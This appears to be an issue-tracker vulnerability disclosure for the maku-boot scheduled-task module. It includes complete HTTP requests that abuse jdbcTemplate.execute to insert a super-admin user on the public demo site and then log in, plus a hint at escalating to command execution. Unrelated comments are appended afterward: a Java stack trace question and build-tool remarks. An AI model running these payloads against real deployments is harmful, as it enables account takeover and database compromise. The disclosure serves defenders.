Impact

version：maku-boot v1.3.0-v2.2.0
Users with "schedule" permissions can execute arbitrary sql statements, even rce

Code Audit

The vulnerability code is located at:

1. https://github.com/makunet/maku-boot/blob/master/maku-boot-module/maku-module-quartz/src/main/java/net/maku/quartz/utils/AbstractScheduleJob.java
2. https://gitee.com/makunet/maku-boot/blob/master/maku-boot-module/maku-module-quartz/src/main/java/net/maku/quartz/utils/AbstractScheduleJob.java
   

Need to find an exploitable method that satisfies the following conditions：

• The class that defines the method is in the spring bean container.
• The method has only one parameter, and the parameter type must be a string.
• The method must be public.

Deploy maku-boot locally and write auxiliary code to find a method that meets the above conditions：

Visit http://localhost:8080/index

Find org.springframework.jdbc.core.JdbcTemplate#execute(java.lang.String) method, this method can perform any SQL statement
The next section is the exploit procedure

Steps to reproduce

Visit the official demo site: https://demo.maku.net/maku-boot/#/login

1. Log in as user name 'admin' and password 'admin'.
   

2. Go to https://demo.maku.net/maku-boot/#/quartz/schedule/index and add timing task after a successful login.
   Click the Add button in the image below.
   

Fill in the following important parameters and click the submit button in the image below：

• bean name: jdbcTemplate
• method name: execute
• method param: INSERT INTO sys_user (id, username, password, real_name, avatar, gender, email, mobile, status, org_id, super_admin, version, deleted, creator, create_time, updater, update_time) VALUES (10099, 'test123', '{bcrypt}$2a$10$mW/yJPHjyueQ1g26WNBz0uxVPa0GQdJO1fFZmqdkqgMTGnyszlXxu', 'test', 'https://cdn.maku.net/images/avatar.png', 0, '[email protected]', '13612345586', 1, null, 1, 0, 0, 10000, now(), 10000, now());

The packet is as follows：

POST /maku-boot-server/schedule HTTP/1.1
Host: demo.maku.net
Cookie: Hm_lvt_dd01f60c05c4a94d3287dd7c580372ff=1667440588; Hm_lpvt_dd01f60c05c4a94d3287dd7c580372ff=1667468738
Content-Length: 583
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101"
Accept-Language: zh-CN
Sec-Ch-Ua-Mobile: ?0
Authorization: 06f170e5cdbf4c83b5e3ba5ffc4cde98
Content-Type: application/json;charset=UTF-8
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.maku.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.maku.net/maku-boot/
Accept-Encoding: gzip, deflate
Connection: close

{"id":"","jobName":"test","jobGroup":"default","beanName":"jdbcTemplate","method":"execute","params":"INSERT INTO sys_user (id, username, password, real_name, avatar, gender, email, mobile, status, org_id, super_admin, version, deleted, creator, create_time, updater, update_time) VALUES (10099, 'test123', '{bcrypt}$2a$10$mW/yJPHjyueQ1g26WNBz0uxVPa0GQdJO1fFZmqdkqgMTGnyszlXxu', 'test', 'https://cdn.maku.net/images/avatar.png', 0, '[email protected]', '13612345586', 1, null, 1, 0, 0, 10000, now(), 10000, now());","cronExpression":"* * * * * ? *","status":0,"concurrent":1,"remark":""}

3. Click the run button in the image below to execute the scheduled task you just created.
   

The packet is as follows：

PUT /maku-boot-server/schedule/run HTTP/1.1
Host: demo.maku.net
Cookie: Hm_lvt_dd01f60c05c4a94d3287dd7c580372ff=1667440588; Hm_lpvt_dd01f60c05c4a94d3287dd7c580372ff=1667468738
Content-Length: 618
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101"
Accept-Language: zh-CN
Sec-Ch-Ua-Mobile: ?0
Authorization: 06f170e5cdbf4c83b5e3ba5ffc4cde98
Content-Type: application/json;charset=UTF-8
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.maku.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.maku.net/maku-boot/
Accept-Encoding: gzip, deflate
Connection: close

{"id":24,"jobName":"test","jobGroup":"default","beanName":"jdbcTemplate","method":"execute","params":"INSERT INTO sys_user (id, username, password, real_name, avatar, gender, email, mobile, status, org_id, super_admin, version, deleted, creator, create_time, updater, update_time) VALUES (10099, 'test123', '{bcrypt}$2a$10$mW/yJPHjyueQ1g26WNBz0uxVPa0GQdJO1fFZmqdkqgMTGnyszlXxu', 'test', 'https://cdn.maku.net/images/avatar.png', 0, '[email protected]', '13612345586', 1, null, 1, 0, 0, 10000, now(), 10000, now());","cronExpression":"* * * * * ? *","status":0,"concurrent":1,"remark":"","createTime":"2022-11-07 11:23:34"}

After the sql statement is successfully executed, an administrator user test123/admin is created

4. Log in to the system as test123/admin
   

The packet is as follows：

POST /maku-boot-server/sys/auth/login HTTP/1.1
Host: demo.maku.net
Cookie: Hm_lvt_dd01f60c05c4a94d3287dd7c580372ff=1667440588; Hm_lpvt_dd01f60c05c4a94d3287dd7c580372ff=1667468738
Content-Length: 104
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101"
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=UTF-8
Accept-Language: zh-CN
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.maku.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.maku.net/maku-boot/
Accept-Encoding: gzip, deflate
Connection: close

{"username":"test123","password":"admin","key":"30aef83e-2804-49ea-acb5-b5678cdc27dc","captcha":"bdrgr"}

Login successful

In addition, any sql statements can be executed, and the maku-boot program supports mysql and postgresql databases. Therefore, the udf may upgrade permissions and execute commands

2023-07-27 17:51:40.610 ERROR 2836 --- [nio-8081-exec-3] com.fhs.trans.utils.TransUtil : 如果字段set错误，请反馈给easytrans开发者

java.lang.reflect.InaccessibleObjectException: Unable to make field private final java.lang.String java.lang.Enum.name accessible: module java.base does not "opens java.lang" to unnamed module @3576ddc2
at java.base/java.lang.reflect.AccessibleObject.throwInaccessibleObjectException(AccessibleObject.java:387)
at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:363)
at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:311)
at java.base/java.lang.reflect.Field.checkCanSetAccessible(Field.java:181)
at java.base/java.lang.reflect.Field.setAccessible(Field.java:175)
at com.fhs.trans.utils.TransUtil.transFields(TransUtil.java:202)
at com.fhs.trans.utils.TransUtil.transOne(TransUtil.java:181)
at com.fhs.trans.utils.TransUtil.transFields(TransUtil.java:219)
at com.fhs.trans.utils.TransUtil.transOne(TransUtil.java:181)
at com.fhs.trans.utils.TransUtil.transFields(TransUtil.java:219)
at com.fhs.trans.utils.TransUtil.transOne(TransUtil.java:181)
at com.fhs.trans.utils.TransUtil.transFields(TransUtil.java:219)
at com.fhs.trans.utils.TransUtil.transOne(TransUtil.java:181)
at com.fhs.trans.advice.EasyTransResponseBodyAdvice.beforeBodyWrite(EasyTransResponseBodyAdvice.java:61)
at org.springframework.web.servlet.mvc.method.annotation.RequestResponseBodyAdviceChain.processBody(RequestResponseBodyAdviceChain.java:141)
at org.springframework.web.servlet.mvc.method.annotation.RequestResponseBodyAdviceChain.beforeBodyWrite(RequestResponseBodyAdviceChain.java:116)
at org.springframework.web.servlet.mvc.method.annotation.AbstractMessageConverterMethodProcessor.writeWithMessageConverters(AbstractMessageConverterMethodProcessor.java:288)
at org.springframework.web.servlet.mvc.method.annotation.RequestResponseBodyMethodProcessor.handleReturnValue(RequestResponseBodyMethodProcessor.java:194)
at org.springframework.web.method.support.HandlerMethodReturnValueHandlerComposite.handleReturnValue(HandlerMethodReturnValueHandlerComposite.java:78)
at org.springframework.web.servlet.mvc.method.annotation.ServletInvocableHandlerMethod.invokeAndHandle(ServletInvocableHandlerMethod.java:136)
at org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.invokeHandlerMethod(RequestMappingHandlerAdapter.java:884)
at org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.handleInternal(RequestMappingHandlerAdapter.java:797)
at org.springframework.web.servlet.mvc.method.AbstractHandlerMethodAdapter.handle(AbstractHandlerMethodAdapter.java:87)
at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:1081)
at org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:974)
at org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:1011)
at org.springframework.web.servlet.FrameworkServlet.doPut(FrameworkServlet.java:925)
at jakarta.servlet.http.HttpServlet.service(HttpServlet.java:566)
at org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:885)
at jakarta.servlet.http.HttpServlet.service(HttpServlet.java:631)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:205)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:149)
at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:53)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:174)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:149)
at org.springframework.web.filter.CorsFilter.doFilterInternal(CorsFilter.java:91)
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:116)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:174)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:149)
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:110)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:174)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:149)
at org.springframework.security.web.FilterChainProxy.lambda$doFilterInternal$3(FilterChainProxy.java:231)
at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:365)
at org.springframework.security.web.access.intercept.AuthorizationFilter.doFilter(AuthorizationFilter.java:100)
at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:374)
at org.springframework.security.web.access.ExceptionTranslationFilter.doFilter(ExceptionTranslationFilter.java:126)
at org.springframework.security.web.access.ExceptionTranslationFilter.doFilter(ExceptionTranslationFilter.java:120)
at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:374)
at org.springframework.security.web.session.SessionManagementFilter.doFilter(SessionManagementFilter.java:131)
at org.springframework.security.web.session.SessionManagementFilter.doFilter(SessionManagementFilter.java:85)
at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:374)
at org.springframework.security.web.authentication.AnonymousAuthenticationFilter.doFilter(AnonymousAuthenticationFilter.java:100)
at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:374)
at org.springframework.security.web.servletapi.SecurityContextHolderAwareRequestFilter.doFilter(SecurityContextHolderAwareRequestFilter.java:179)
at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:374)
at org.springframework.security.web.savedrequest.RequestCacheAwareFilter.doFilter(RequestCacheAwareFilter.java:63)
at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:374)
at net.maku.framework.security.filter.AuthenticationTokenFilter.doFilterInternal(AuthenticationTokenFilter.java:82)
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:116)
at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:374)
at org.springframework.security.web.authentication.logout.LogoutFilter.doFilter(LogoutFilter.java:107)
at org.springframework.security.web.authentication.logout.LogoutFilter.doFilter(LogoutFilter.java:93)
at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:374)
at org.springframework.security.web.header.HeaderWriterFilter.doHeadersAfter(HeaderWriterFilter.java:90)
at org.springframework.security.web.header.HeaderWriterFilter.doFilterInternal(HeaderWriterFilter.java:75)
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:116)
at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:374)
at org.springframework.security.web.context.SecurityContextHolderFilter.doFilter(SecurityContextHolderFilter.java:82)
at org.springframework.security.web.context.SecurityContextHolderFilter.doFilter(SecurityContextHolderFilter.java:69)
at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:374)
at org.springframework.security.web.context.request.async.WebAsyncManagerIntegrationFilter.doFilterInternal(WebAsyncManagerIntegrationFilter.java:62)
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:116)
at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:374)
at org.springframework.security.web.session.DisableEncodeUrlFilter.doFilterInternal(DisableEncodeUrlFilter.java:42)
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:116)
at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:374)
at org.springframework.security.web.FilterChainProxy.doFilterInternal(FilterChainProxy.java:233)
at org.springframework.security.web.FilterChainProxy.doFilter(FilterChainProxy.java:191)
at org.springframework.web.filter.DelegatingFilterProxy.invokeDelegate(DelegatingFilterProxy.java:352)
at org.springframework.web.filter.DelegatingFilterProxy.doFilter(DelegatingFilterProxy.java:268)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:174)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:149)
at org.springframework.web.filter.RequestContextFilter.doFilterInternal(RequestContextFilter.java:100)
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:116)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:174)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:149)
at org.springframework.web.filter.FormContentFilter.doFilterInternal(FormContentFilter.java:93)
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:116)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:174)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:149)
at org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:201)
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:116)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:174)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:149)
at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:166)
at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:90)
at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:493)
at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:115)
at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:93)
at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:74)
at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:341)
at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:390)
at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:63)
at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:894)
at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1741)
at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:52)
at org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1191)
at org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659)
at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
at java.base/java.lang.Thread.run(Thread.java:1623)
我接口正常返回结果，数据也正常，却有这样的一种错误，是怎么回事

考虑由 Maven 切换到 Gradle 吗

我没有成功，不知道怎么编译。